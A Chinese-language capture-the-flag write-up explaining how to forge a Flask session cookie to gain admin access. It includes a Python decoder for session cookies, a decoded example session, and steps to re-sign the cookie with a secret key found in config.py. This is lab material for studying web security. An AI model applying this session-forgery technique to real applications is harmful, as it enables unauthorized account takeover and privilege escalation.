这个题有很多种解法,弱口令,和利用strslow()函数,该wp主要写的是利用伪造flask——session获取flag
关于flask的session的一些简单知识
Flask的session使用 - 简书 (jianshu.com)
我们发现需要身份为admin才可以为所欲为
?注册
注册成功后在登录时进行抓包观察
此时我们对这串加密后的编码进行解码
?解密代码如下
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)
decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True
try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')
if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')
return session_json_serializer.loads(payload)
if __name__ == '__main__':
print(decryption('session写这'.encode()))
?解密结果:
{'_fresh': True, '_id': b'7825952ea8845281c0777e584de48c6b6a8b885876c3b7e3ecdaa2f57f70ac6bd816c6d9eb791958752999306499eab0988c658ebf9b5081e4fe1239420dc22f', 'csrf_token': b'b6fb3a1fbdf95cb9fd5d0d9437c0268c130d09ff', 'image': b'iQcX', 'name': '111', 'user_id': '10'}
我们观察到session中有一项name为我们自己的id只要将其改为admin即可
之后在源文件中的config.py中找到他的密钥匙’ckj123‘,将'name': '111'改为'name': 'admin’在进行加密即可
加密工具:GitHub - noraj/flask-session-cookie-manager: Flask Session Cookie Decoder/Encoder
?之后将伪造的session替换原来的session即可获取flag
?
?